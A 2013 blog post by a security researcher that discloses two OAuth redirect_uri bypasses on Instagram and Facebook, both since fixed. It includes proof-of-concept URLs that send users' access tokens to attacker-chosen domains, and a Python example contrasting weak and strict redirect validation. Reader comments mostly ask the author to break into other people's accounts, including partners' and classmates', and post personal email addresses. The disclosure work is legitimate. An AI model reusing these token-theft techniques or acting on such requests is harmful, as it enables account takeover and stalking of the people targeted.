2 May 2013
Category: Uncategorized

How I Hacked Instagram Accounts

In this post, I’m going to show how I was able to hack into Instagram accounts via OAuth vulnerabilities on instagram.com and facebook.com.

There are basically two ways to take advantage of Instagram OAuth:

1. Hijack Instagram accounts using Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)

A successful attack gives us access to:

  • Private photos
  • The ability to delete photos and edit comments
  • The ability to post new photos

Because I’m a fan of Instagram, I thought to myself, “Maybe I should check their security?”

So when Facebook acquired Instagram, I started checking them for security vulnerabilities.

I reported several vulnerabilities to them, including OAuth attacks, but the acquisition hadn’t closed yet and Facebook Security was unable to put their hands on the security issues. So I waited, and I waited as a WhiteHat.

Later I received a message from Facebook Security. They said that even though they could not fix it yet, they still wanted to pay for these vulnerabilities.

 

[Screenshot: “Acquired”]

So I told them there was no need for a payout, because they could not perform security checks before the closing of the acquisition.

It’s amazing to see what a great job Facebook Security is doing with their bug bounty program: even though the acquisition hadn’t closed, they still wanted to pay for these vulnerabilities.

 

While researching Instagram’s security parameters, I noticed that Facebook Security had already produced some impressive results against Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validating the redirect_uri parameter.

 

[Screenshot: Instagram OAuth blocking a different domain in redirect_uri]

In addition, redirection was only allowed to the owner app’s domain. That was particularly bad news for me.

So I needed to find some other way past their protection. Further complicating things, you can’t use a site redirection / XSS on the victim’s owner app, because you have no access to files or folders on the owner app domain through the redirect_uri parameter.

 

[Screenshot: Instagram OAuth blocking files and folders in redirect_uri]

For example, with an app whose domain is apigee.com:

Allowed request:

  • redirect_uri=https://apigee.com

Blocked requests:

  • redirect_uri=https://www.breaksec.com
  • redirect_uri=https://a.apigee.com/
  • redirect_uri=https://apigee.com/x/x.php
  • redirect_uri=https://apigee.com/%23 (likewise “,”, “?” or any other special sign)

As it stood, it appeared that the redirect_uri was invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth check and have the access_token / code sent to their own domain.

For instance:

Let’s say my app client_id in Instagram is 33221863xxx and my domain is breaksec.com.

In this case, the redirect_uri parameter should only allow redirection to my domain (breaksec.com), right? What happens when we change the suffix of the domain to something like:

breaksec.com.mx

In this example, the attacker can send the access_token / code straight to breaksec.com.mx. For the attack to succeed, of course, the attacker has to buy the new domain (in this case, breaksec.com.mx).

[Screenshot: breaksec.com.mx shown as available for registration]

It’s also feasible to purchase other domains that start with breaksec.com, such as:

  • com.tw
  • com.mx
  • com.es
  • com.co
  • com.bz
  • com.br
  • com.ag

PoC bypass (fixed by the Facebook Security team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token

 

Game Over.

 

Bug 2.

 

For this bug, I used the Instagram client_id value with the Facebook OAuth dialog (https://www.facebook.com/dialog/oauth).

 

When you use the Instagram app, it can be integrated with Facebook.

For example, when a user wants to upload their Instagram photos to Facebook, they allow this integration to take place.

[Screenshot: Instagram sharing options]

[Screenshot: Facebook permission dialog, “Instagram would like to access your public profile and friend list”]

To my surprise, I discovered that an attacker can use virtually any domain in the redirect_uri / next parameter. This was baffling, and I don’t know why it happened, but it worked: you can literally use any domain in the redirect_uri / next parameter when the request is made with the Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user.

With the access_token, the attacker can post on the victim’s behalf on their Facebook account and access their private friends list.

 

PoC (Facebook already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
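Both bugs come down to the same validation mistake, so the Python below is an added example (not Instagram’s or Facebook’s code) that contrasts a prefix-string check on redirect_uri with a parsed, component-by-component check, run over the redirect targets from bug 1 and bug 2. The client_id and breaksec.com come from the post; the registry, the `evil.example` decoy and the function names are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed registry for one hypothetical app: the client_id from the post's
# first PoC URL, registered to the author's domain. Not Instagram's real model.
REGISTERED = {"33221863eec546659f2564dd71a8a38d": "https://breaksec.com"}

def weak_check(client_id, redirect_uri):
    """Textual prefix match: the class of check the post's suffix trick beats,
    since 'https://breaksec.com.mx' starts with 'https://breaksec.com'."""
    allowed = REGISTERED.get(client_id)
    return allowed is not None and redirect_uri.startswith(allowed)

def strict_check(client_id, redirect_uri):
    """Parse both URLs and require the components to match one by one."""
    allowed = REGISTERED.get(client_id)
    if allowed is None:
        return False
    want, got = urlsplit(allowed), urlsplit(redirect_uri)
    # Scheme pinned, and no user:pass@ part that could disguise the real host.
    if got.scheme != want.scheme or got.username or got.password:
        return False
    # Host equality after parsing: breaksec.com.mx and a.breaksec.com both fail.
    if not got.hostname or got.hostname.lower() != want.hostname.lower():
        return False
    if (got.port or 443) != (want.port or 443):
        return False
    # Path pinned to the registered one (so /x/x.php is refused); no query/fragment.
    return ((got.path or "/") == (want.path or "/")
            and not got.query and not got.fragment)

# The redirect targets discussed in the post, plus one constructed userinfo decoy.
CANDIDATES = [
    "https://breaksec.com",               # the registered app domain
    "https://breaksec.com.mx",            # suffix trick from bug 1
    "https://a.breaksec.com/",            # subdomain
    "https://breaksec.com/x/x.php",       # file/folder on the app domain
    "https://breaksec.com/%23",           # special character
    "http://files.nirgoldshlager.com",    # unrelated domain, as in bug 2
    "https://breaksec.com@evil.example",  # constructed: real host hidden after '@'
]

def evaluate(check, client_id="33221863eec546659f2564dd71a8a38d"):
    """Return {redirect_uri: accepted?} for one validator over CANDIDATES."""
    return {uri: check(client_id, uri) for uri in CANDIDATES}

if __name__ == "__main__":
    for name, check in (("weak", weak_check), ("strict", strict_check)):
        for uri, ok in evaluate(check).items():
            print(f"{name:6} {'ACCEPT' if ok else 'REJECT'}  {uri}")
```

Only the registered domain survives the strict check; the prefix check waves through the suffix trick, the path variants and the `@` decoy.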

 

PoC Video:

See you next time ;)

 

By @Nirgoldshlager

 

 

25 responses on “How I Hacked Instagram Accounts”

  1. seriously you’re doing a great Job :d

  2. k0nsl says:

    In short: impressive!

  3. H says:

    Could you possibly hack an account for me? Please email me bulldog_girl@bellsouth.net . Thanks

  4. polo says:

    Could you possibly delete an account for me? Please my friend my email is luis_polo10@hotmail.com

  5. Erica says:

    I used a fake name but I seriously need your help ASAP! I need an account deactivated that has been using inappropriate photos of me and I need the page gone ASAP! I will provide you with necessary information thank you!

  6. bob says:

    Hello, could you please help me hack this instagram account: PRISCILOZANO I think my wife is cheating on me, and I DON’T have access to her instagram, thanks

  7. Alicia says:

    I will pay you heaps if you can get me my account back.
    please email me at:::: Aliciamarrie@hotmail.com

  8. JN says:

    can you help me hack into an account please

  9. Steph says:

    Hi, I don’t remember my password and my account for some reason isn’t being recognised by Facebook even though it’s linked. Would you be able to help me retrieve my password?

  10. Kris says:

    can you help me? I’m getting threats from an instagram and i’d like to know who it is.

  11. LDR says:

    Can you please help me hack a imposter account that’s giving out false information of someone I am close to? Email me @ lanasdelrey12@gmail.com

  12. christina cowley says:

    hey there! could you please get my account back for me? my email is cowleytina5@yahoo.com, and my hacked IG is @christinacowleyyy

  13. Kimberly says:

    Hi. I would really like the username @demi on instagram but it’s taken by an inactive user, therefore I can’t get it. Could you possibly hack their account and change the username so I could get it. Please email me ASAP.

  14. Hannah says:

    hi, my Instagram account @lovatoshine that I was co-owning with two of my friends just got hacked. if you hack it back for me ASAP it would be awesome so please & thank you!!

  15. Amy says:

    Hey! Could you please hack @anacolagreco for me on instagram? She’s really mean to me at school and I’ve had it.. Thank you for your time xxx

  16. Maya says:

    If you don’t mind, could you email me at: xTamagotchi@gmail.com and give me a simple step-by-step tutorial on how to hack back my account? Also there are account names that I want but they are taken but their accounts are inactive and Instagram won’t take them off! And the hate pages also! Thank you so much!

  17. larry says:

    please hack for and with us email me at baker.larry92@yahoo.com i would like an instagram account hacked sometimes you just have to leave it to the pros.

  18. Terese says:

    Could you possibly delete an IG account for me? or show me the steps, email me tgmac100@gmail.com

  19. Sarah says:

    Hi! I forgot my password on IG and i can’t figure it out. IG won’t link to my fb and it also won’t send a reset password to my email please help!!! :( username is sarahmayaguilar

  20. merly says:

    can you open her photos http://instagram.com/anatavadya/ thank you

  21. Chantel says:

    Can You Please Email Me About Getting My Instagram Back I Need Help !

  22. Pissed off wife! says:

    I need your help….please email me At sxyangelmom2b@aol.com…..this woman is having an affair with My husband and i want to catch her but i cant see any Of her Photos…..i am pregnant and really need your help….need to know the truth because I’m pissed off and hormonal!….not a good combo!

  23. Thomas says:

    Can u hack my girl’s Instagram. I need to know all the comments she gets. Please get back to me

  24. Nikki says:

    My ig was hacked. I can’t find an official number or location of instagram in which I could contact them. I’m asking if you could please help me get my account back. I was using it to help promote my clothing line.

  25. Selena says:

    Can you help me get my 1st instagram back? it got hacked and i am trying to get it back for like a long time so if you can help me out please email me at selenayan99@gmail.com thank you! i will appreciate it if you can :D
